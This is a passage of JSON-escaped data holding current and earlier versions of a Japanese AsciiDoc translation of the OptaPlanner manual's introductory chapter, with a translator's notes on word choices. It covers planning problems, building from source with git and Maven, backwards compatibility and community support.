your class path\n\/\/\/\/\n\n.\u6ce8\u610f\n****\n\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u305f zip \u5185\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea +*binaries*+ \u306b\u306f\u3001+optaplanner-core+ \u304c\u5b9f\u969b\u306b\u4f7f\u7528\u3059\u308b\u3088\u308a\u3082\u306f\u308b\u304b\u306b\u591a\u304f\u306e jar \u3092\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002+optaplanner-benchmark+ \u306a\u3069\u4ed6\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u4f7f\u7528\u3059\u308b jar \u3082\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150914 Takugo\nSource: far more jars then\nCorrected: far more jars than\n\/\/\/\/\n\nMaven \u30ea\u30dd\u30b8\u30c8\u30ea\u306e +*pom.xml*+ \u30d5\u30a1\u30a4\u30eb\u3092\u78ba\u8a8d\u3057\u3001(\u7279\u5b9a\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306e\u305f\u3081\u306e) \u7279\u5b9a\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306b\u3064\u3044\u3066\u3001\u6700\u5c0f\u306e\u4f9d\u5b58\u6027\u30bb\u30c3\u30c8\u3092\u6c7a\u3081\u3066\u304f\u3060\u3055\u3044\u3002\n****\n\n\n\n[[buildFromSource]]\n=== 1.4.4. OptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b\n\nOptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b\u306e\u306f\u7c21\u5358\u3067\u3059\u3002\n\n{empty}1. link:https:\/\/help.github.com\/articles\/set-up-git\/[Git \u3092\u8a2d\u5b9a]\u3057\u3001GitHub \u304b\u3089\u306e +clone optaplanner+ \u3092\u5b9f\u884c\u3057\u307e\u3059\u3002(\u307e\u305f\u306f\u3001link:https:\/\/github.com\/droolsjbpm\/optaplanner\/zipball\/master[zipball] \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002)\n\n----\n$ git clone git@github.com:droolsjbpm\/optaplanner.git optaplanner\n...\n----\n\n.\u6ce8\u610f\n****\nGitHub \u30a2\u30ab\u30a6\u30f3\u30c8\u3092\u6301\u3063\u3066\u3044\u306a\u3044\u5834\u5408\u3084\u3001\u30ed\u30fc\u30ab\u30eb\u306e Git \u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u8a2d\u5b9a\u304c\u305d\u306e\u30a2\u30ab\u30a6\u30f3\u30c8\u3067\u306a\u3055\u308c\u3066\u3044\u306a\u3044\u5834\u5408\u306f\u3001\u4ee3\u308f\u308a\u306b\u6b21\u306e\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u8a8d\u8a3c\u554f\u984c\u3092\u56de\u907f\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n----\n$ git clone https:\/\/github.com\/droolsjbpm\/optaplanner.git optaplanner\n...\n----\n****\n\n{empty}2. link:http:\/\/maven.apache.org\/[Maven] \u3092\u4f7f\u3063\u3066\u30d3\u30eb\u30c9\u3057\u307e\u3059\u3002\n\n----\n$ cd optaplanner\n$ mvn clean install -DskipTests\n...\n----\n\n.\u6ce8\u610f\n****\nMaven \u306e\u521d\u56de\u306f\u3001jar \u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u5fc5\u8981\u304c\u3042\u308b\u305f\u3081\u3001\u6642\u9593\u304c\u304b\u304b\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n****\n\n{empty}3. \u30b5\u30f3\u30d7\u30eb\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\n\n----\n$ cd optaplanner-examples\n$ mvn exec:exec\n...\n----\n\n{empty}4. \u597d\u307f\u306e IDE \u3067\u30bd\u30fc\u30b9\u3092\u7de8\u96c6\u3057\u307e\u3059\u3002\n\n{empty}5. \u30aa\u30d7\u30b7\u30e7\u30f3: Java \u30d7\u30ed\u30d5\u30a1\u30a4\u30e9\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\n\n\n\n[[governance]]\n== 1.5. \u7ba1\u7406\u30fb\u904b\u55b6\n\n[[statusOfOptaPlanner]]\n=== 1.5.1. OptaPlanner \u306e\u30ec\u30d9\u30eb\u306e\u9ad8\u3055\n\nOptaPlanner \u304c\u6301\u3064\u7279\u9577:\n\n* *\u5b89\u5b9a\u6027*: \u30e6\u30cb\u30c3\u30c8\u3054\u3068\u306e\u30c6\u30b9\u30c8, \u7d71\u5408\u74b0\u5883\u3067\u306e\u30c6\u30b9\u30c8, \u30b9\u30c8\u30ec\u30b9\u30c6\u30b9\u30c8\u306b\u3088\u3063\u3066\u975e\u5e38\u306b\u3088\u304f\u30c6\u30b9\u30c8\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u4fe1\u983c\u6027*: \u4e16\u754c\u4e2d\u3067\u3001\u88fd\u54c1\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u3002\n* *\u30b9\u30b1\u30fc\u30e9\u30d3\u30ea\u30c6\u30a3*: \u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3067\u306f\u300150000 \u500b\u306e\u5909\u6570\u304c\u6271\u308f\u308c\u3001\u305d\u306e 5000 \u500b\u3054\u3068\u306b\u3001\u8907\u6570\u306e\u7a2e\u985e\u306e\u5236\u7d04\u3068\u305d\u308c\u3092\u6e80\u305f\u3059\u4f55\u5104\u3082\u306e\u30d1\u30bf\u30fc\u30f3\u304c\u6271\u308f\u308c\u3066\u3044\u308b\u3002\n* *\u6574\u5099\u3055\u308c\u305f\u6587\u66f8*: \u8a73\u7d30\u306a\u672c\u30de\u30cb\u30e5\u30a2\u30eb\u3084\u591a\u304f\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u4e00\u3064\u3092\u898b\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[backwardsCompatibility]]\n=== 1.5.2. \u5f8c\u65b9\u4e92\u63db\u6027\n\nOptaPlanner \u3067\u306f\u3001API \u3068\u5b9f\u88c5\u304c\u5206\u96e2\u3055\u308c\u307e\u3059\u3002\n\n* *\u30d1\u30d6\u30ea\u30c3\u30af API:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.api*+ \u306f\u3001\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u3001100% \u306e\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002\n* *Impl \u30af\u30e9\u30b9:* \u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.impl*+ \u306b\u3042\u308b\u3059\u3079\u3066\u306e\u30af\u30e9\u30b9\u306b\u306f\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u304c\u3042\u308a\u307e\u305b\u3093\u3002\u5c06\u6765\u306e\u30ea\u30ea\u30fc\u30b9\u306b\u304a\u3044\u3066\u5909\u66f4\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002link:https:\/\/github.com\/droolsjbpm\/optaplanner\/blob\/master\/optaplanner-distribution\/src\/main\/assembly\/filtered-resources\/UpgradeFromPreviousVersionRecipe.txt[UpgradeFromPreviousVersionRecipe.txt]\u3068\u547c\u3070\u308c\u308b\u30ec\u30b7\u30d4\u306b\u306f\u3001\u65b0\u3057\u3044\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u30a2\u30c3\u30d7\u30b0\u30ec\u30fc\u30c9\u3059\u308b\u5834\u5408\u306e\u3001\u5404\u5909\u66f4\u5185\u5bb9\u304a\u3088\u3073\u305d\u306e\u5909\u66f4\u306b\u3059\u3070\u3084\u304f\u5bfe\u51e6\u3059\u308b\u65b9\u6cd5\u304c\u8a18\u8ff0\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n* *XML \u8a2d\u5b9a:* XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u975e\u30d1\u30d6\u30ea\u30c3\u30af API \u30af\u30e9\u30b9\u3092\u4f7f\u7528\u3059\u308b\u5fc5\u8981\u306e\u3042\u308b\u8981\u7d20\u3092\u9664\u304f\u3059\u3079\u3066\u306e\u8981\u7d20\u306b\u3064\u3044\u3066\u3001\u5f8c\u65b9\u4e92\u63db\u6027\u3092\u6709\u3057\u307e\u3059\u3002XML \u30bd\u30eb\u30d0\u8a2d\u5b9a\u306f\u3001\u30d1\u30c3\u30b1\u30fc\u30b8\u540d\u524d\u7a7a\u9593 +*org.optaplanner.core.config*+ \u306b\u3042\u308b\u30af\u30e9\u30b9\u306b\u3088\u3063\u3066\u5b9a\u7fa9\u3055\u308c\u307e\u3059\u3002\n\n.\u6ce8\u610f\n****\n\u672c\u8aac\u660e\u66f8\u3067\u306f\u3001impl \u30af\u30e9\u30b9\u3082\u3044\u304f\u3064\u304b\u6271\u308f\u308c\u3066\u3044\u307e\u3059\u3002\u305d\u308c\u3089\u6587\u66f8\u5316\u3055\u308c\u305f impl \u30af\u30e9\u30b9\u306f\u3001(\u672c\u8aac\u660e\u66f8\u3067\u5b9f\u9a13\u7684\u306a\u3082\u306e\u3060\u3068\u660e\u8a18\u3055\u308c\u306a\u3044\u9650\u308a) \u4fe1\u983c\u6027\u304c\u3042\u308a\u3001\u5b89\u5168\u306b\u4f7f\u7528\u3067\u304d\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u305d\u308c\u3089\u306f\u3001\u78ba\u5b9a\u7684\u306b\u8a18\u8ff0\u3059\u308b\u306b\u306f\u307e\u3060\u6642\u671f\u5c1a\u65e9\u306a\u3082\u306e\u3060\u3068\u79c1\u305f\u3061\u306f\u8003\u3048\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150915 Takugo\nSource: we're just not entirely comfortable yet to write their signatures in stone\nInterpreted as: the impl classes are still subject to changes. \n\/\/\/\/\n****\n\n\n\n[[communityAndSupport]]\n=== 1.5.3. \u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u3068\u30b5\u30dd\u30fc\u30c8\n\n\u30cb\u30e5\u30fc\u30b9\u3084\u8a18\u4e8b\u306f\u3001link:https:\/\/www.optaplanner.org\/blog\/[\u79c1\u305f\u3061\u306e\u30d6\u30ed\u30b0] \u3084 Google+ (link:https:\/\/plus.google.com\/\\+OptaPlannerOrg[OptaPlanner], link:https:\/\/plus.google.com\/\\+GeoffreyDeSmet[Geoffrey De Smet])\u3001Twitter (link:https:\/\/twitter.com\/OptaPlanner[OptaPlanner], link:https:\/\/twitter.com\/GeoffreyDeSmet[Geoffrey De Smet]) \u3067\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002*OptaPlanner \u304c\u5f79\u306b\u7acb\u3063\u305f\u5834\u5408\u306b\u306f\u3001\u305d\u306e\u3053\u3068\u306b\u3064\u3044\u3066\u30d6\u30ed\u30b0\u306b\u66f8\u3044\u305f\u308a Twitter \u3067\u3064\u3076\u3084\u3044\u305f\u308a\u3057\u3066\u3001\u79c1\u305f\u3061\u3092\u3054\u652f\u63f4\u304f\u3060\u3055\u3044\uff01*\n\nlink:https:\/\/www.optaplanner.org\/community\/forum.html[\u79c1\u305f\u3061\u306e\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30fc\u306e\u516c\u958b\u30d5\u30a9\u30fc\u30e9\u30e0]\u3067\u306e\u8cea\u554f\u3084link:https:\/\/issues.jboss.org\/browse\/PLANNER[\u8ab2\u984c\u30c8\u30e9\u30c3\u30ab\u30fc]\u3067\u306e\u30d0\u30b0\u5831\u544a\u3001\u6a5f\u80fd\u8981\u671b\u3092\u6b53\u8fce\u3057\u307e\u3059\u3002GitHub \u3078\u306e pull \u8981\u6c42\u3092\u5927\u3044\u306b\u6b53\u8fce\u3057\u3001\u512a\u5148\u7684\u306b\u6271\u3044\u307e\u3059\uff01\u3054\u81ea\u8eab\u306e\u6539\u5584\u3092\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u5316\u3059\u308c\u3070\u3001\u305d\u308c\u306b\u5bfe\u3057\u3066\u79c1\u305f\u3061\u304c\u52a0\u3048\u308b\u5c02\u9580\u7684\u306a\u30c1\u30a7\u30c3\u30af\u3084\u3055\u3089\u306a\u308b\u6539\u826f\u3092\u3054\u81ea\u8eab\u306e\u305f\u3081\u306b\u5f79\u7acb\u3066\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\n\nRed Hat \u306f\u3001\u4e2d\u6838\u3068\u306a\u308b\u30c1\u30fc\u30e0\u3092\u96c7\u7528\u3059\u308b\u5f62\u3067\u3001OptaPlanner \u306e\u5c55\u958b\u3092\u5f8c\u63f4\u3057\u3066\u3044\u307e\u3059\u3002\u4f01\u696d\u5411\u3051\u306e\u30b5\u30dd\u30fc\u30c8\u3084\u30b3\u30f3\u30b5\u30eb\u30c6\u30a3\u30f3\u30b0\u306b\u3064\u3044\u3066\u306f\u3001link:https:\/\/www.optaplanner.org\/community\/product.html[BRMS \u304a\u3088\u3073 BPMS \u88fd\u54c1] (\u542b OptaPlanner) \u3092\u53c2\u7167\u3059\u308b\u304b\u3001link:http:\/\/www.redhat.com\/en\/about\/contact\/sales[Red Hat \u3078\u304a\u554f\u3044\u5408\u308f\u305b]\u304f\u3060\u3055\u3044\u3002\n\n\n\n[[relationshipWithKie]]\n=== 1.5.4. Drools \u3084 jBPM \u3068\u306e\u95a2\u4fc2\n\nOptaPlanner \u306f\u3001link:https:\/\/www.kiegroup.org\/[KIE \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30fb\u30b0\u30eb\u30fc\u30d7]\u306e\u4e00\u90e8\u3067\u3059\u3002KIE \u30b0\u30eb\u30fc\u30d7\u306f\u3001link:https:\/\/www.drools.org\/[Drools] \u30eb\u30fc\u30eb\u30a8\u30f3\u30b8\u30f3\u3068 link:https:\/\/www.jbpm.org\/[jBPM] \u30ef\u30fc\u30af\u30d5\u30ed\u30fc\u30a8\u30f3\u30b8\u30f3\u3068\u3068\u3082\u306b\u3001\u5b9a\u671f\u7684\u306b (\u901a\u5e38 1\u301c2 \u56de\/\u6708) \u30ea\u30ea\u30fc\u30b9\u3055\u308c\u307e\u3059\u3002\n\/\/\/\/\n150916 Takugo\nSource: It releases regularly\nInterpreted as: The KIE group is released regularly\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/kieFunctionalityOverview.png[]\n\nDrools \u3092\u7528\u3044\u305f\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u7d71\u5408\u306b\u3064\u3044\u3066\u3088\u308a\u591a\u304f\u77e5\u308b\u306b\u306f\u3001link:https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/index.html#architectureOverview[\u69cb\u9020\u306e\u6982\u8981]\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n\n\n\n","old_contents":"= Chapter 1. OptaPlanner \u30a4\u30f3\u30c8\u30ed\u30c0\u30af\u30b7\u30e7\u30f3\n:awestruct-description: Chapter 1. OptaPlanner \u30a4\u30f3\u30c8\u30ed\u30c0\u30af\u30b7\u30e7\u30f3\n:awestruct-layout: localizedBase\n:awestruct-lang: ja\n:awestruct-priority: 1.0\n:showtitle:\n\n\n\nxref:whatIsOptaPlanner[1.1. OptaPlanner \u3068\u306f\u4f55\u3067\u3059\u304b\uff1f]:: \nxref:requirements[1.2. \u5fc5\u8981\u306a\u3082\u306e]:: \nxref:whatIsAPlanningProblem[1.3. \u8a08\u753b\u554f\u984c\u3068\u306f\uff1f]:: \nxref:aPlanningProblemIsNPCompleteOrNPHard[1.3.1. \u8a08\u753b\u554f\u984c\u306f NP \u5b8c\u5168\u307e\u305f\u306f NP \u56f0\u96e3]::: \nxref:aPlanningProblemHasConstraints[1.3.2. \u8a08\u753b\u554f\u984c\u306b\u306f\u5236\u7d04\u304c\u3042\u308b\uff08\u30cf\u30fc\u30c9, \u30bd\u30d5\u30c8\u5236\u7d04\uff09]::: \nxref:aPlanningProblemHasAHugeSearchSpace[1.3.3. \u8a08\u753b\u554f\u984c\u306f\u5de8\u5927\u306a\u63a2\u7d22\u7a7a\u9593\u3092\u6301\u3064]::: \nxref:downloadAndRunTheExamples[1.4. \u30b5\u30f3\u30d7\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3068\u5b9f\u884c]:: \nxref:getTheReleaseZipAndRunTheExamples[1.4.1. \u516c\u958b .zip \u306e\u5165\u624b\u3068\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c]::: \nxref:runTheExamplesInAnIDE[1.4.2. IDE (IntelliJ, Eclipse, NetBeans) \u3067\u306e\u30b5\u30f3\u30d7\u30eb\u306e\u5b9f\u884c]::: \nxref:useWithMavenGradleEtc[1.4.3. OptaPlanner \u3092 Maven \u3084 Gradle, Ivy, Buildr, ANT \u3068\u3068\u3082\u306b\u4f7f\u3046]::: \nxref:buildFromSource[1.4.4. OptaPlanner \u3092\u30bd\u30fc\u30b9\u304b\u3089\u30d3\u30eb\u30c9\u3059\u308b]::: \nxref:governance[1.5. \u7ba1\u7406\u30fb\u904b\u55b6]:: \nxref:statusOfOptaPlanner[1.5.1. OptaPlanner \u306e\u30ec\u30d9\u30eb\u306e\u9ad8\u3055]::: \nxref:backwardsCompatibility[1.5.2. \u5f8c\u65b9\u4e92\u63db\u6027]::: \nxref:communityAndSupport[1.5.3. \u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u3068\u30b5\u30dd\u30fc\u30c8]::: \nxref:relationshipWithKie[1.5.4. Drools \u3084 jBPM \u3068\u306e\u95a2\u4fc2]::: \n\n[]\n[[whatIsOptaPlanner]]\n== 1.1 OptaPlanner \u3068\u306f\u4f55\u3067\u3059\u304b\uff1f\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/optaPlannerLogo.png[]\n\n*link:https:\/\/www.optaplanner.org\/[OptaPlanner] \u306f\u3001\u8a08\u753b\u554f\u984c\u306e\u6700\u9069\u89e3\u3092\u5f97\u308b\u3001\u7d44\u307f\u8fbc\u307f\u53ef\u80fd\u3067\u8efd\u91cf\u306a\u5236\u7d04\u5145\u8db3\u30a8\u30f3\u30b8\u30f3\u3067\u3059\u3002* \u6b21\u306e\u3088\u3046\u306a\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u3092\u89e3\u304d\u307e\u3059\u3002\n\/\/\/\/\n150907 by Takugo\nSource: which optimizes planning problems\nInterpreted as: which obtains optimized solutions for planning problems\n\u201c\u554f\u984c\u201d\u3092\u6700\u9069\u5316\u3059\u308b\u306e\u3067\u306f\u306a\u3044\u304b\u3089\u3002\n\/\/\/\/\n\n* *\u5f93\u696d\u54e1\u30b7\u30d5\u30c8\u52e4\u52d9\u8a08\u753b:* \u770b\u8b77\u5e2b\u3084\u4fee\u7406\u5de5\u306a\u3069\u306e\u52e4\u52d9\u8868\u4f5c\u6210\n* *\u5b9f\u65bd\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u4f1a\u8b70, \u8a2d\u5099, \u30e1\u30f3\u30c6\u30ca\u30f3\u30b9\u4f5c\u696d, \u5e83\u544a\u306a\u3069\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0\n* *\u6559\u80b2\u6642\u9593\u5272\u308a:* \u6388\u696d, \u8b1b\u5ea7, \u8a66\u9a13, \u4f1a\u8b70\u30d7\u30ec\u30bc\u30f3\u30c6\u30fc\u30b7\u30e7\u30f3\u306a\u3069\u306e\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0\n* *\u8f38\u9001\u7d4c\u8def\u8a08\u753b:* \u8377\u7269\u304a\u3088\u3073\uff0f\u307e\u305f\u306f\u4eba\u3092\u4e57\u305b\u305f\u4e57\u308a\u7269 (\u30c8\u30e9\u30c3\u30af, \u5217\u8eca, \u8239\u8236, \u98db\u884c\u6a5f\u306a\u3069) \u306e\u8a08\u753b\n* *\u7bb1\u8a70\u3081\uff08\u30d3\u30f3\u30d1\u30c3\u30ad\u30f3\u30b0\uff09:* \u30b3\u30f3\u30c6\u30ca, \u30c8\u30e9\u30c3\u30af, \u8239\u8236\u3078\u306e\u7a4d\u8f09\u3084\u5009\u5eab\u3078\u306e\u4fdd\u7ba1, \u3055\u3089\u306b\u306f\u30af\u30e9\u30a6\u30c9\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u306e\u30ce\u30fc\u30c9\u306a\u3069\u3082\n* *\u6ce8\u6587\u751f\u7523\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u81ea\u52d5\u8eca\u7d44\u7acb\u30e9\u30a4\u30f3, \u6a5f\u68b0\u51e6\u7406, \u4eba\u54e1\u4f5c\u696d\u306a\u3069\u306e\u8a08\u753b\n* *\u5728\u5eab\u524a\u6e1b:* \u7d19\u3084\u92fc, \u30ab\u30fc\u30da\u30c3\u30c8\u306a\u3069\u306e\u5207\u65ad\u3067\u751f\u3058\u308b\u7121\u99c4\u306e\u6700\u5c11\u5316\n* *\u30b9\u30dd\u30fc\u30c4\u306b\u304a\u3051\u308b\u30b9\u30b1\u30b8\u30e5\u30fc\u30ea\u30f3\u30b0:* \u30d5\u30c3\u30c8\u30dc\u30fc\u30eb\u3084\u91ce\u7403\u306a\u3069\u306e\u30ea\u30fc\u30b0\u6226\u8a08\u753b\n\/\/\/\/\n150907 by Takugo\nSource: planning football leagues, baseball leagues, ...\nInterpreted as: planning the league games of football, baseball, ...\n* *\u8ca1\u52d9\u6700\u9069\u5316:* \u6295\u8cc7\u30dd\u30fc\u30c8\u30d5\u30a9\u30ea\u30aa\u306e\u6700\u9069\u5316, \u30ea\u30b9\u30af\u5206\u6563\u306a\u3069\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/useCaseOverview.png[]\n\n\u3042\u3089\u3086\u308b\u7d44\u7e54\u304c\u8a08\u753b\u554f\u984c\u306b\u76f4\u9762\u3057\u3066\u3044\u307e\u3059\u3002\u88fd\u54c1\u3084\u30b5\u30fc\u30d3\u30b9\u306f\u3001_\u5236\u7d04\u3092\u53d7\u3051_ \u3001\u9650\u5b9a\u3055\u308c\u305f\u30ea\u30bd\u30fc\u30b9 (\u5f93\u696d\u54e1, \u8cc7\u7523, \u6642\u9593, \u91d1) \u3092\u4f7f\u3063\u3066\u63d0\u4f9b\u3055\u308c\u3066\u3044\u307e\u3059\u3002OptaPlanner \u306f\u3001\u305d\u306e\u3088\u3046\u306a\u8a08\u753b\u3092\u6700\u9069\u5316\u3059\u308b\u3053\u3068\u306b\u3088\u3063\u3066\u3001\u3088\u308a\u5c11\u306a\u3044\u30ea\u30bd\u30fc\u30b9\u3067\u3088\u308a\u591a\u304f\u306e\u696d\u52d9\u3092\u5b9f\u884c\u3067\u304d\u308b\u3088\u3046\u306b\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001_\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u30ba\u30ea\u30b5\u30fc\u30c1_ \u5206\u91ce\u306e\u4e00\u3064\u3067\u3042\u308b _\u5236\u7d04\u5145\u8db3\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0_ \u3068\u3057\u3066\u77e5\u3089\u308c\u3066\u3044\u307e\u3059\u3002\n\/\/\/\/\n150917 Takugo\nSource: Constraint Satisfaction Programming\nInterpreted as: Constraint Programming (without \"satisfaction\") = \u5236\u7d04\u30d7\u30ed\u30b0\u30e9\u30df\u30f3\u30b0, not the meaning of programming problem = \u8a08\u753b\u554f\u984c\n\/\/\/\/\n\nimage::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/whatIsAPlanningProblem.png[]\n\nOptaPlanner \u306e\u52a9\u3051\u304c\u3042\u308c\u3070\u3001\u666e\u901a\u306e Java(TM) \u30d7\u30ed\u30b0\u30e9\u30de\u30fc\u3067\u3082\u5236\u7d04\u5145\u8db3\u554f\u984c\u3092\u52b9\u7387\u3088\u304f\u89e3\u304f\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002OptaPlanner \u306e\u5185\u90e8\u3067\u306f\u3001\u6700\u9069\u5316\u306e\u305f\u3081\u306e\u30d2\u30e5\u30fc\u30ea\u30b9\u30c6\u30a3\u30c3\u30af\u6cd5\u304a\u3088\u3073\u30e1\u30bf\u30d2\u30e5\u30fc\u30ea\u30b9\u30c6\u30a3\u30c3\u30af\u6cd5\u304c\u975e\u5e38\u306b\u52b9\u7387\u7684\u306a\u30b9\u30b3\u30a2\u8a08\u7b97\u3068\u7d44\u307f\u5408\u308f\u3055\u308c\u3066\u3044\u307e\u3059\u3002\n\n\n\n[[requirements]]\n== 1.2. \u5fc5\u8981\u306a\u3082\u306e\n\nOptaPlanner\u306f\u3001link:http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30e9\u30a4\u30bb\u30f3\u30b9 2.0]\u306e\u4e0b\u3067\u914d\u5e03\u3055\u308c\u308b _\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30fb\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2_ \u3067\u3059\u3002\u3053\u306e\u30e9\u30a4\u30bb\u30f3\u30b9\u306f\u3001\u975e\u5e38\u306b\u9032\u6b69\u7684\u3067\u3001\u5546\u7528\u76ee\u7684\u3067\u306e\u518d\u4f7f\u7528\u3092\u8a31\u53ef\u3057\u3066\u3044\u307e\u3059\u3002link:http:\/\/www.apache.org\/foundation\/license-faq.html#WhatDoesItMEAN[\u4e00\u822c\u5411\u3051\u8aac\u660e]\u306b\u76ee\u3092\u901a\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\nOptaPlanner \u306f\u3001100% \u7d14\u7c8b\u306b Java(TM) \u3067\u4f5c\u3089\u308c\u3066\u304a\u308a\u3001\u30d0\u30fc\u30b8\u30e7\u30f3 1.6 \u4ee5\u4e0a\u306e\u3059\u3079\u3066\u306e JVM \u4e0a\u3067\u52d5\u4f5c\u3057\u307e\u3059\u3002\u4ed6\u306e Java(TM) \u6280\u8853\u3068\u306exref:integration[\u7d71\u5408\u306f\u975e\u5e38\u306b\u7c21\u5358]\u3067\u3059\u3002OptaPlanner \u306f\u3001xref:useWithMavenGradleEtc[Maven Central Repository]\u3067\u5229\u7528\u3067\u304d\u307e\u3059\u3002\n\n\/\/ image::https:\/\/docs.optaplanner.org\/6.4.0.Final\/optaplanner-docs\/html_single\/images\/Chapter-Planner_introduction\/compatibility.png[] \/\/\nimage:images\/Chapter-Planner_introduction\/compatibility.png[]\n\n\n\n[[whatIsAPlanningProblem]]\n== 1.3. \u8a08\u753b\u554f\u984c\u3068\u306f\uff1f\n\n[[aPlanningProblemIsNPCompleteOrNPHard]]\n=== 1.3.1. \u8a08\u753b\u554f\u984c\u306f NP \u5b8c\u5168\u307e\u305f\u306f NP \u56f0\u96e3\n\n\u4e0a\u306b\u6319\u3052\u305f\u30e6\u30fc\u30b9\u30b1\u30fc\u30b9\u306f\u3059\u3079\u3066\u3001_\u304a\u305d\u3089\u304f_ \u3001link:http:\/\/en.wikipedia.org\/wiki\/NP-complete[NP \u5b8c\u5168]\u3082\u3057\u304f\u306f\u305d\u308c\u3088\u308a\u3082\u56f0\u96e3\u306a\u554f\u984c\u3067\u3059\u3002NP \u5b8c\u5168\u3068\u306f\u3001\u666e\u901a\u306e\u8a00\u8449\u3067\u8868\u73fe\u3059\u308b\u3068\u6b21\u306e\u3088\u3046\u306a\u610f\u5473\u3067\u3059\u3002\n\n* \u554f\u984c\u306e\u89e3\u3092\u3001\u7c21\u5358\u306b\u3001\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u691c\u8a3c\u3067\u304d\u308b\u3002\n* \u554f\u984c\u306e\u6700\u9069\u89e3\u3092\u9069\u5ea6\u306a\u6642\u9593\u5185\u306b\u898b\u3064\u3051\u308b\u78ba\u5b9f\u306a\u65b9\u6cd5\u304c\u306a\u3044(*)\u3002\n\n.\u6ce8\u610f\n****\n(*) \u5c11\u306a\u304f\u3068\u3082\u3001\u4e16\u754c\u4e2d\u306e\u982d\u306e\u5207\u308c\u308b\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u79d1\u5b66\u8005\u3067\u3055\u3048\u3001\u307e\u3060\u8ab0\u3082\u305d\u306e\u3088\u3046\u306a\u78ba\u5b9f\u306a\u65b9\u6cd5\u3092\u898b\u51fa\u305b\u3066\u3044\u307e\u305b\u3093\u3002\u3057\u304b\u3057\u3001\u8ab0\u304b\u304c 1 \u3064\u306e NP \u5b8c\u5168\u554f\u984c\u306b\u3064\u3044\u3066\u89e3\u3092\u4e00\u3064\u898b\u3064\u3051\u305f\u3068\u3057\u305f\u3089\u3001\u305d\u306e\u89e3\u306f\u3059\u3079\u3066\u306e NP 